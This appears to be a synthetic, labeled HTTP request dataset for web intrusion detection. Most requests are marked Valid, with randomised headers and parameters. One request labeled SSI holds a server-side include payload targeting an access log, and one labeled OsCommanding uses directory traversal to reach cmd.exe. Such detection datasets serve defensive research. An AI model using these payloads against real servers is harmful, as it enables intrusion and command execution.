Referer: /sT6aunif.bin
TE: deflate,trailers,gzip
Trailer: User-Agent
User-Agent: Mozilla/6.4 (Machintosh; U; Mac OS X 3.2; xp-za; rv:0.8.4) Gecko/64590888
UA-CPU: Sparc
UA-Disp: 2226,321,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 412x961
Via: 5.5 132.54.238.57
Transfer-Encoding: tesEtr; aPitrm=yeyayjp
Upgrade: dog/2.3, ranys/6.1, ariu/3.6, aatroo/3.3, eb8/2.3
Warning: 295 www.ensg.png "bmssbEen" 
X-Forwarded-For: 61.182.37.41
X-Serial-Number: 541499677250739
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 621
Start - Id: 7680
class: Valid
POST /_GDbAopenj7f.htm? HTTP/1.0
Content-Length: 251
Content-Language: e
Content-Encoding: deflate
Content-Location: /7iPlctn/tlosatih/oogutah/mnrua2N.gif
Content-MD5: dHJlbmxzcm5pMHRBdWNzMA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Mar 04 18:52:48 GMT
Last-Modified: Tue, 15 May 07 06:05:29 GMT
Host: 237.28.1.144
Connection: close
Accept: text/*, video/mpeg;q=0.6, text/*;q=0.2
Accept-Charset: iso-8859-8, utf-7;q=0.4, shift_jis;q=0.2, euc-tw;q=0.0, x-mac-arabic;q=0.2
Accept-Encoding: compress;q=0.3, identity;q=0.2, identity;q=0.7, compress;q=0.9
Accept-Language: diTfralj-lew3htHn, x-n, hatrtY6-tis;q=0.0, od-i
Cache-Control: max-stale
Client-ip: 41.206.202.253
Cookie: h0aTV4V=nODc;QQ7RL06rZMexec=89;lta4fe=9
Cookie2: $Version="33"
Date: Thu, 17 Mar 05 24:10:04 UTC
ETag: W/"7E5qJF5v.rXfCi-ebzjq"
Expect: 100-continue
From: iein@nruizurNh.it
If-Modified-Since: Wed, 11 Mar 09 13:54:49 CET
If-Unmodified-Since: Mon, 08 Sep 08 16:40:27 CET
If-Match: *
If-None-Match: "dVsn48af6t4BXVaj3mp"
If-Range: Thu, 21 Jun 07 18:02:00 GMT
Max-Forwards: 8
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: uocnn dT6my=esqesaq
Authorization: hsbaeo 2Yiw8a=Ntwew
Range: -5
Referer: http://374e.st/alxm/lttiet/odos/qczsteSk.tar
TE: chunked;q=0.8,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 0.0; oi-8e; rv:9.3.1) Gecko/16105267
UA-CPU: MIPS
UA-Disp: 803,660,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 223x0002
Via: 8.5 www.eomiho.html:445, 5.3 www.Ue4eu.jpg, lir/3.1 www.i4con6.html
Transfer-Encoding: identity
Upgrade: reasrf/4.1
Warning: 953 www.sgtzoeOm.png:0 "musiwDeiogabd1ld" "Fri, 16 Jan 04 11:28:31 GMT"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 207817974117
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

XwjYaH=eTCs&UjXcB=71&eibv=iumtUtaaci&ekkadd0SoiecHtt=+r pccgvs&arlELx7nden=o&bdoJxrTt91iah=e2n&siape0aaeaen=setr6wedyr1alo7Weg&lddoit=JxUeg7ceaPmhw&mfhcrii=n-Y7&xohsoad5hNea3=e&rrcawert>t]@&laliiseocngoel=2lt Satelnet]iwa&tYoxtdth=5Enioelt

End - Id: 7680
Start - Id: 9085
class: Valid
GET /my4BY3ln.oMebx/hsiHzdba/O5rdDigRmLGdB/mW6ZoIvryG8vHC244gWy/o1e6ftloia/icvttsse9eohsxgeOan.php3?0t-v6mInull=ctdp3Ye&lvfsanH=llhpt2ifghtnmoia&divsN2tmp@1W=67658&P8SgVme8LOSt=4069&sne=Ueoaftlo&edb=t+ao+&87%uUPHwJhS=903305&3BiCHyAKMGXxp_=rb&Ee=jaopa2nn+o%3Bmea&f7aeMebhhsi6=ac8t&j88C=rq%40QCFQI5xx&asee7hisyaicng=67563&ertsHi8M=irsemtei&ltnt0aenLl=lppZ HTTP/1.0
Host: www.nioe1eet.it
Connection: keep-alive
Accept: video/*, text/plain;q=0.1
Accept-Charset: iso-8859-6
Accept-Encoding: 
Accept-Language: ithesAsi-4;q=0.9
Cache-Control: min-fresh=9
Client-ip: 212.96.25.34
Cookie: soee6la3eo1s=58927431;oos=asdo27bZr49;bi4PmsZFyrqlr=nfo 6oguacc0jc 6;e
Cookie2: $Version="73"
Date: Tue, 18 Nov 08 16:10:09 CET
ETag: W/"3l9qrxDIQubeQZBIZ"
Expect: atctr7=tetz0Vi;iurtb
From: riunul@rssjpw.cz
If-Modified-Since: Thu, 30 Aug 07 13:41:37 UTC
If-Unmodified-Since: Tue, 14 Jun 05 06:09:04 UTC
If-Match: "2.._@Vy996mf9WRdLO"
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM ZW5pZGlub3N0YWVuYUVieW5iYmhybmNXbXdvdGJLc3NhZXM=
Authorization: NTLM ZWloeHdtcnRvY2hkaWVFdGNld2w4aGN0dHNtZnpob3JSZ0RlZHRlYkRp
Range: 8902-,8054-
Referer: /haec/2cewc/uees.mdb
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.8 (compatible; Konqueror/2.6; Open BSD i586; dddam5)
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9463x953
Via: lioef/7.5 www.editee.jpg
Transfer-Encoding: compress
Upgrade: aaa/4.7, fk2w/0.5, aae/4.6
Warning: 284 243.236.131.97 "ecoowdcc2ipb" "Fri, 03 Apr 09 17:35:41 CET"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9085
Start - Id: 1061
class: Valid
GET /9drwsguh/tahOeutjei/Anrie0dyyere0atbrx/duhPZPG/kFeAmbese7esep/utn5dwkaWhecbsgen32a/LooeCin/8iX0YM-PAjs/eFPKgdqT/lseuhniuwgig/yl4ilqe/3Df8UF_y.html?5qyisg=+Bn&hRoor8f=75154701&awh2uias=gna%3E4stdinvpassthru HTTP/1.0
Host: www.d3edveehp.com
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.7, iso-8859-7;q=0.7, iso-8859-2;q=0.4, windows-874;q=0.2, windows-1255;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: feuMestj-boanle;q=0.7, 2yelha-dUdtgzm;q=0.3, 5nref5-pc
Cache-Control: min-fresh=74863
Client-ip: 50.94.142.13
Cookie: pitw3eih=611669162;uduemetrchesi=ifY2envv5X0q
Cookie2: $Version="638"
Date: Thu, 12 Jul 07 22:02:29 UTC
ETag: "s4jB_nyoPZKVpmgwAX"
Expect: 100-continue
From: anc5zmb@gSashsa.gov
If-Modified-Since: Sun, 27 Dec 09 09:18:21 CET
If-Unmodified-Since: Wed, 05 Dec 07 19:03:41 UTC
If-Match: "md8_DeRSJ-@bkZL"
If-None-Match: *
If-Range: *
Max-Forwards: 52
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM aXRyZXNkbzRvcnhyY2VleXR0ZW1ybnNhRXplbnphaTdSNW9SYWVpYmVuNg==
Authorization: Digest uri=http://www.nsbtw.ch/oTyMlze/vi8m.jpg
Range: 46238-
Referer: http://tsdrsmoi.be/itgj3nea/Ticitceh/ouqlh.jsp
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.7 (X11; U; Unix 7.5; i5-ge; rv:2.1.2) Gecko/93168629
UA-CPU: MIPS
UA-Disp: 465,0552,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 5208x202
Via: 0.3 192.65.87.51, 2.1 www.efeksh.jpg, HTTP/3.5 173.58.216.130
Transfer-Encoding: compress
Upgrade: mie/3.2, kgma/1.7, oli/9.3, oyl/8.2
Warning: 193 www.rtlgaoe.html "hooiiessaotooale" "Fri, 01 Sep 06 09:10:44 CET"
X-Forwarded-For: 65.243.221.166
X-Serial-Number: 3135796940
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1061
Start - Id: 17680
class: Valid
GET /Mk5tk3rltNxe6Hii/eELD7dWD__1d5T/udVcUEgOBmly/aeenost/MWLk4Cecho12OmailO/ndS/witedhoahrwtnittmtus/hl5qUh-6tBex/dDc8nenlv.html?wpeSenhch=33518992&eAtYoejijmd=lJ8WXzqcQmiG&itoab=nsUenee6hcohncta&itlmeniut=egre3%5Dd%26gc&haHknxdlCnilt=surg%7Cslnl&n0enmwI=shemsUffhNr&eow4ye=sDVoqknV39&viYW7uj87L=%2Fnma&fSMzJV=39482&BwNZIEM9connect8c=Amet&2hyueEugQl=39661921&iM=%29ee&iii=r%5C HTTP/1.0
Host: www.Eaj2aqeT1.uk:794
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: compress, compress;q=0.1, deflate;q=0.0, gzip;q=0.0, compress;q=0.0
Accept-Language: etuom-io3;q=0.1, t-stwe6, i-rnht;q=0.2
Cache-Control: max-stale
Client-ip: 219.60.27.189
Cookie: tetp=390928;G_ZY_having_VmochaLT=a?ta\hwinntymn edaeadmina;hfnyrolhiaapEe=ftvopeehlawrLzsNon;u4hmaissie=2048;wfchw=uometatc;oayapltCe=672784494
Cookie2: $Version="9"
Date: Fri, 05 Dec 08 02:33:06 GMT
ETag: "-ijoCDQLmVe67K4s1K1K"
Expect: adoelhJ9=ha5n;bu1yaaq5=otenea
From: ham2@rhhtcs.de
If-Modified-Since: Fri, 06 Jun 08 11:35:36 UTC
If-Unmodified-Since: Sat, 01 May 04 02:14:21 GMT
If-Match: *
If-None-Match: "F.P6rXgUhLRUM8lY"
If-Range: Sat, 20 Oct 07 06:51:25 GMT
Max-Forwards: 990
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: ds5n eodzhhx=stpesdru
Authorization: Basic TjRhcmVieTowdDBuc3d1Nw==
Range: 0-,07-
Referer: http://2mwe7e.org/hbtcch/waii/ghaema5/rsZq/eehwaxot.jpg
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.3 (compatible; w8nelsEebi; Unix; m5oo)
UA-CPU: Sparc
UA-Disp: 3353,591,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5218x1595
Via: 9.0 www.uucmawsi.gif, 4.8 162.177.66.196, nafnl/6.6 48.232.88.54:60753
Transfer-Encoding: deflate
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 607 www.ab3E5tss.png "3i5gweeoi8uw5re" 
X-Forwarded-For: 255.19.115.5
X-Serial-Number: 09480693646047521886
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17680
Start - Id: 1894
class: Valid
GET /nVrG9EhCdIVCzuo/iO.F0HvaFXV6WXsC..U/cWvlK.html? HTTP/1.0
Host: www.3rsRyinnb.ch:80
Connection: keep-alive
Accept: image/png;q=0.2, image/*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: compress;q=0.9, gzip;q=0.6, compress
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 136.226.137.157
Cookie: w5=aa;lsscIaiseirf=ternsRp26en;htlaussNnna=8216
Cookie2: $Version="57"
Date: Tue, 05 Dec 06 06:53:23 UTC
ETag: "1NL.gzgPn2JTRd0Zwv"
Expect: oroaNt=namtWhbs
From: hfTlg@eeXge7.fr
If-Modified-Since: Sat, 03 Sep 05 16:34:17 CET
If-Unmodified-Since: Thu, 09 Apr 09 19:30:52 UTC
If-Match: "Kj8yI3aY@i36rBALAI"
If-None-Match: "b@AI85S@TVkN@_98V6"
If-Range: *
Max-Forwards: 966
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: wrea ltni=8Rsiyra
Authorization: ttfrld i8gi=ezdelM
Range: -943,-739,0-64
Referer: /L7ate/o8cslu.php
TE: trailers,deflate
Trailer: Expect
User-Agent: Mozilla/2.5 (X11; U; Linux i586 3.0; gh-s0; rv:2.6.4) Gecko/15215350
UA-CPU: MIPS
UA-Disp: 272,378,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 722x920
Via: 4.0 www.imeErhtt.htm, HTTP/6.4 153.61.209.106, HTTP/5.3 38.110.0.180
Transfer-Encoding: zHaa; lssa=kgne7
Upgrade: tomf/2.5, DFma/1.5
Warning: 924 www.bbtn.js "trtrnasnAn" 
X-Forwarded-For: 96.142.115.10
X-Serial-Number: 54871844
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1894
Start - Id: 31284
class: Valid
GET /J7-35etiw/a1b4as/PLl5Y4/e@8.gif? HTTP/1.1
Host: 173.6.19.54:82
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: 4btuits-dheio;q=0.4, er4te-rw, ziI-tadhyr, seoNn-uetnEee, ost-oSweao;q=0.2
Cache-Control: max-age=81293
Client-ip: 74.69.207.31
Cookie: TRjomailhmetcwE=ai;En7ioD89Oxhaal=ai'a+8s[eatxe;eUT-ERTyI=h76jRaollud;wWmAu7=3488862413;ahTxsdtsiim=71
Cookie2: $Version="4"
Date: Wed, 22 Jun 05 08:12:56 CET
ETag: "Gscpz.g0HmvES8SSd"
Expect: 100-continue
From: Jaodie@trvhtsHeY.ch
If-Modified-Since: Fri, 05 Mar 04 16:56:01 CET
If-Unmodified-Since: Sun, 17 Apr 05 07:41:36 GMT
If-Match: "nS8tHehjb6h15PN_0h_"
If-None-Match: "_-LWMP4YkdVd8uZWXlx"
If-Range: *
Max-Forwards: 130
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: Basic MU9lZTpnM2U3ckNiRQ==
Range: -388719
Referer: /dtel/Ahrrngcn/sAii.gz
TE: gzip;q=0.0
Trailer: Expect
User-Agent: Mozilla/6.4 (compatible; MSIE 6.0; Open BSD i586; arttez)
UA-CPU: Sparc
UA-Disp: 5325,2370,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3795x126
Via: mhi/9.5 www.ifhh62at.shtml
Transfer-Encoding: identity
Upgrade: GorsU/6.8
Warning: 003 104.186.55.32:84616 "cIIietnrr" "Tue, 16 Dec 08 21:07:19 GMT"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 2832995137
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31284
Start - Id: 34166
class: Valid
PUT /ica/6aecsedfn5stoiEahn/NLjlinsert4B3ULkpj/wysoauiusza9xZbc3/ecCc15mMPm/uEyn4PMO7vlmuod/7U/slosdnefm/iNaBSnZGL1EG.pl? HTTP/1.0
Content-Length: 286
Content-Language: srt1t
Content-Encoding: identity
Content-Location: http://uaan.fr/esti/edoi/v0eotc.pl
Content-MD5: YUFycnJzbnJ0Y2EyZ2VlOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 Jan 08 06:21:18 UTC
Last-Modified: Mon, 14 Jun 04 11:46:38 UTC
Host: 11.218.204.74
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-8859-3;q=0.1, iso-10646-ucs-2, x-mac-japanese;q=0.4
Accept-Encoding: compress, compress, compress;q=0.2, compress, compress;q=0.6
Accept-Language: Ooeh-skoR3pe, safcp-nF;q=0.6, ssaoeDd-Usa;q=0.3, iHb4ro-aAlSroer;q=0.3, 5rrstnoh-laqplnhe;q=0.3
Cache-Control: max-age=8960
Client-ip: 229.106.129.24
Cookie: gorAsgphg=4Y;i3u7u=e.2T;feteEe=itsielnnph-ehhB;5C.f1uq=0853;essf7sdeai4scya=98;aglaryUv=aT nw9<nh-isdwgetnHn1
Cookie2: $Version="00"
Date: Wed, 05 Dec 07 07:57:19 CET
ETag: "W6RIxcRFJaUsrHepwgOU"
Expect: 100-continue
From: ol8k@oiren.st
If-Modified-Since: Thu, 10 Jan 08 18:27:42 CET
If-Unmodified-Since: Sat, 11 Aug 07 13:00:38 CET
If-Match: *
If-None-Match: "-EKiJU11uKCir9FMjodf"
If-Range: "uGsS60OgYoIcjWK4Zk"
Max-Forwards: 2517
MIME-Version: 8.3
Pragma: Araa=al2O
Proxy-Authorization: sahe tsshe=ajtnobe
Authorization: Digest realm
Range: 713-,7885-54
Referer: /sI6j/iAhya/t0snhef/knnooiEy.jsp
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/3.3 (X11; U; Linux i586 9.5; sc-AE; rv:7.3.3) Gecko/19206955
UA-CPU: x86
UA-Disp: 892,7658,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 995x590
Via: 6.1 www.vber.gif, FTP/4.9 200.249.246.39, 0.0 38.54.61.73
Transfer-Encoding: deflate
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 026 www.euaepe.tiff "E1ssmoL4mnehtgAslnrW" 
X-Forwarded-For: 124.239.210.255
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

leteNsLxoeeee=w2o7wz&tdbaoO=a0Ak&o8h0Uzhslc=epocfrom&hreec=75834&8etlrustrcs=srnrdnrBada&4BbAgroup by@k=pjow0&legoe=hx8lssdrnhbnatg&e88lbyoe7taoe=samwys1where1souloitposition&nreciISocNl=1915302894&oD53sfdohtfyb3=o~Emochac2&ndaob8zhefaxhme=y|dn&oH3Zhome3gz_Rkor=s8t&Xeo8Dghsgt=40637

End - Id: 34166
Start - Id: 24039
class: Valid
GET /yfl5bsRWksVMRsn6-/jrnaemrpssavdhS/on0duttma6zfhs/hp8/Px.jpeg?zectdtf=221893260&iie=5&2dthm0O7znae3G=wis8f&eh=k%29r-e%3Di%3B+%3E%25&rtepihlnjnSnSO=aNimr&nnpLue=2378517386&i8s=ie&els7ebtcahpss=30751037 HTTP/1.0
Host: 51.83.253.110
Connection: close
Accept: text/*;q=0.1, image/*, image/*;q=0.1
Accept-Charset: hz-gb-2312;q=0.9, x-mac-arabic, euc-cn;q=0.4, big5;q=0.9
Accept-Encoding: gzip
Accept-Language: eR-u;q=0.7, nz0o5nzl-umrcNe
Cache-Control: only-if-cached
Client-ip: 222.183.40.181
Cookie: opto=admin8lg 7oe'ncg
Cookie2: $Version="03"
Date: Sun, 27 Feb 05 03:29:44 UTC
ETag: W/"20wIx6HmMcAyfM-Ple"
Expect: era0lhbh
From: ategn@e61x0hpQf.ch
If-Modified-Since: Mon, 04 Oct 04 10:36:55 UTC
If-Unmodified-Since: Thu, 16 Aug 07 23:37:25 CET
If-Match: "zvMcd2xC4hJzeiO"
If-None-Match: *
If-Range: "uzxGPqGG4cAUyddT"
Max-Forwards: 6
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: 5pue neoh0ai=ade4maHi
Authorization: lnooe 7tatmoTa=ubrUp
Range: 3-,-932
Referer: http://734a.it/tpilasr/hlqnat.dll
TE: trailers
Trailer: Date
User-Agent: ii0dA/3.6.1.0.5
UA-CPU: StrongARM
UA-Disp: 6759,036,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 314x0873
Via: 6.8 www.YYcn.htm:91, 8.4 187.255.4.65
Transfer-Encoding: gzip
Upgrade: cUYte/7.0, Lbem/8.5, drnfie/8.0, np54/2.3, taoeT/3.0
Warning: 652 250.250.27.45 "ucdaI7dsmtc" 
X-Forwarded-For: 60.32.75.53
X-Serial-Number: 908783309035145114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24039
Start - Id: 21498
class: Valid
GET /lx39AiARE/hae8kB5dsKM/12T1rCd.q4KQCh/uzTk7dU@/jksfxty.R-mY3Rsq4gFY/ct_Lfzw/euClrtRnaasyNzW/adJB/nteestmhEnzNceei/tGYvqXkp@FC/swr3DAI3oAMV/hzb1fDNgc.SWrXTlThU.php?ytioEn=iwherebe+ HTTP/1.0
Host: www.qbce.cz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ire-n2a;q=0.4, aooi-6Jspyse;q=0.4, nseietee-itr5, pohsewt-r8c
Cache-Control: min-fresh=6557
Client-ip: 31.224.188.26
Cookie: dutfwnyoaooss=rzmidiwsvlu ti 
Cookie2: $Version="185"
Date: Sat, 28 Feb 09 20:01:29 UTC
ETag: "OjvcqtoKxqm_f3Sr4"
Expect: Wd1fssa=gTrite;esres
From: 8whhees@Oeeq.net
If-Modified-Since: Thu, 29 Jul 04 08:36:53 CET
If-Unmodified-Since: Sun, 14 Mar 04 14:16:50 CET
If-Match: *
If-None-Match: "pojijh3YaLFL_F@"
If-Range: Sun, 27 Mar 05 03:42:59 GMT
Max-Forwards: 170
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM ZUFlc2hncG5tZjZvMHNkcnRkdHNkWGluMWVrZWlkdHlzc2VuYg==
Authorization: Digest username="lztX"
Range: 8137-,-4
Referer: http://www.saft.be/r4erical/naytgve.png
TE: trailers,chunked;q=0.2,deflate
Trailer: If-Unmodified-Since
User-Agent: epRv-M http://www.ote2sa6k.fr
UA-CPU: x86
UA-Disp: 130,178,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7753x3387
Via: FTP/6.9 www.Ofbe.gif, eas/9.4 160.0.155.35, 3.3 238.129.43.160:5
Transfer-Encoding: gzip
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 278 www.noeiu.jpg "ddshudlt" 
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21498
Start - Id: 4047
class: Valid
PUT /ueoacetsfe6re/rb9m2j4zhzj/bfMPXfa_VJmFlI0UD/Wfta/CIPUWnullL9i2rc-C/@_Ynnscript0/sere/tLsAmg7-cFjCV/rHwYLb5miss22pHnTR/C0lRexorio9dhe/ea/BQEgA81ncopy-.asmx? HTTP/1.1
Content-Length: 24
Content-Language: nl6a0rnh,csIuss,ngo
Content-Encoding: identity
Content-Location: /hisgbRc/crosen/5anib/iuhn.dll
Content-MD5: bnRic2V0dG1zZGV0dGFhZw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 11 Oct 05 15:30:58 CET
Last-Modified: Thu, 01 Feb 07 06:41:06 GMT
Host: www.qsht4.com
Connection: clPhbldn
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: Dt='fa0Ll5'
Client-ip: 90.81.123.225
Cookie: gepimwtnoldt=c3deoNa8(-;ste=tahl(nc;iws2ttEeus=6;tene=vtcq
Cookie2: $Version="3"
Date: Tue, 19 Apr 05 02:46:56 UTC
ETag: W/"5T9h.WDJdfHidGMl4"
Expect: 100-continue
From: eittnis@mfhoIolo.net
If-Modified-Since: Wed, 02 Mar 05 15:51:11 CET
If-Unmodified-Since: Sun, 28 Feb 10 23:44:19 GMT
If-Match: "rLGvBDr6bLjXIgqLDl9"
If-None-Match: "6hXGD8oC9QjEY89xfNQ"
If-Range: "HAwmmPb@onp8vSLMG"
Max-Forwards: 6
MIME-Version: 4.8
Pragma: ozwOf=4
Proxy-Authorization: tvSo3 l1oo=dbetatzy
Authorization: rxgg ernen=stOv
Range: 96453-834
Referer: /ewpEwasd/zddy/no2o/leel.js
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/7.6 (compatible; MSIE 2.4; Solaris; 5nhGdat; xpk21ahra)
UA-CPU: PowerPC
UA-Disp: 055,684,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 333x496
Via: HTTP/6.8 www.toe8s.tiff:7980, HTTP/7.4 www.rdlatawm.html, FTP/2.4 www.osjeo.shtml
Transfer-Encoding: gzip
Upgrade: knge/9.2, thhhOo/4.5, tlmet/8.8, ex2/3.7
Warning: 077 170.228.207.137 "0iuylmonu9ff" 
X-Forwarded-For: 167.12.120.135
X-Serial-Number: 8242203190314
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Meta=aiamlrd&emlsx0=iwTv

End - Id: 4047
Start - Id: 39820
class: SSI
GET /xey.aspx?iv9=7&oqczsni=434301&craehyzeiioe4=%27si&Bjulogm27=nwb&2KC0v=4495130282&shheere=855849&nseaoxltpi1=%3C%21--+%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++--%3E&ior=tm&tgotiq=aaiEnispasswd2oc&tslhxitl5=2751255&oaeueIalTsrbxe=445&AElsaurioqruhhf=ozaeq+%5D%5D&6Nhhhe=6111041&si=a%40QQ HTTP/1.1
Host: www.zehhee4b4.fr
Connection: f7tfeb
Accept: application/rtf, application/*, video/quicktime
Accept-Charset: *
Accept-Encoding: 
Accept-Language: gs-l3Iaiu, l4t-smzaDqce;q=0.9, aicdr-R9hiea;q=0.3
Cache-Control: no-store
Client-ip: 179.116.196.3
Cookie: oLUxconnectnetcat4Xbgsoundcbj=3l7zjRB-fP3;SSseg8pe2K=379;9ho5sietoT=$bhonufuflr setolaccepto;hkOscriptjZo=665
Cookie2: $Version="15"
Date: Sat, 23 May 09 10:03:17 GMT
ETag: "ay_ewtMOxJLhLfPq-YRu"
Expect: rsGesn
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Sun, 05 Nov 06 19:33:22 UTC
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: *
If-None-Match: "q-i_cNb6EftgGyVE"
If-Range: Fri, 23 Jan 04 18:55:57 GMT
Max-Forwards: 8955
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic aWJlejJFUGk6dWVibGV3
Authorization: taxs reahho=t9eaicne
Range: 40-,-909,-0651
Referer: /AnRm/lhke.cfm
TE: trailers,gzip,trailers
Trailer: Connection
User-Agent: Anhaap (fGBezHap; rq3kVlV; hUka8VcBi0; nqg2gY4N; vwcWNr)
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: 9.4 232.33.104.2, FTP/0.7 87.1.80.182:9
Transfer-Encoding: tu4uso; eqsoos=ctau
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 408744625517883
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39820
Start - Id: 44300
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 53.89.127.113
Connection: erhhte7
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: identity, identity
Accept-Language: 4ttut-9awibE1, Stino-utdip;q=0.9, i-rurm, scoehtd-ba
Cache-Control: no-cache
Client-ip: 18.62.79.179
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Fri, 11 Feb 05 22:30:31 CET
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Tue, 15 Mar 05 04:36:56 GMT
If-Match: "b-3et0hK1ij@XhQlRZb"
If-None-Match: *
If-Range: Thu, 08 Jun 06 05:24:57 UTC
Max-Forwards: 95
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="herhr"
Authorization: Basic QXZuUmhjcnU6YWc2bmExaA==
Range: 3-
Referer: http://ndrn.uk/be3xbt/afUm/aIeh.doc
TE: deflate,chunked,trailers
Trailer: Expect
User-Agent: Mozilla/5.4 (Windows; U; Windows NT 8.9; rx-yE; rv:5.9.3) Gecko/85033997
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 521x0746
Via: 1.3 www.wttans.png:729
Transfer-Encoding: compress
Upgrade: ott9i/7.1, tei/4.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44300
Start - Id: 19319
class: Valid
GET /t0bIDhrWE7dwFzKG/tQdCl7QjsQEJ.css?zmaj=%25tw&e6lu=5376338&nzlwtnal8dyE=pyjE7WlA2jgl&apO5=eo&lstrHatn0noiau=9692&a8fSw=rny&0Xshutdownegay=anmxa7mwrhaUncr+zmhautoexec&eheCpkua4ox=ti8t8d0escpn4oweW&t5faasurbtr=+%24&e4haj5w3v=3vJrZ HTTP/1.0
Host: 53.221.79.9:80
Connection: keep-alive
Accept: audio/x-wav;q=0.3, application/*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: hCox-qmb, 6lv1trob-rZq;q=0.1
Cache-Control: rxk=m
Client-ip: 151.104.120.92
Cookie: tthetcXmoedd=\ynilaeUo8
Cookie2: $Version="7"
Date: Thu, 12 Mar 09 02:15:23 CET
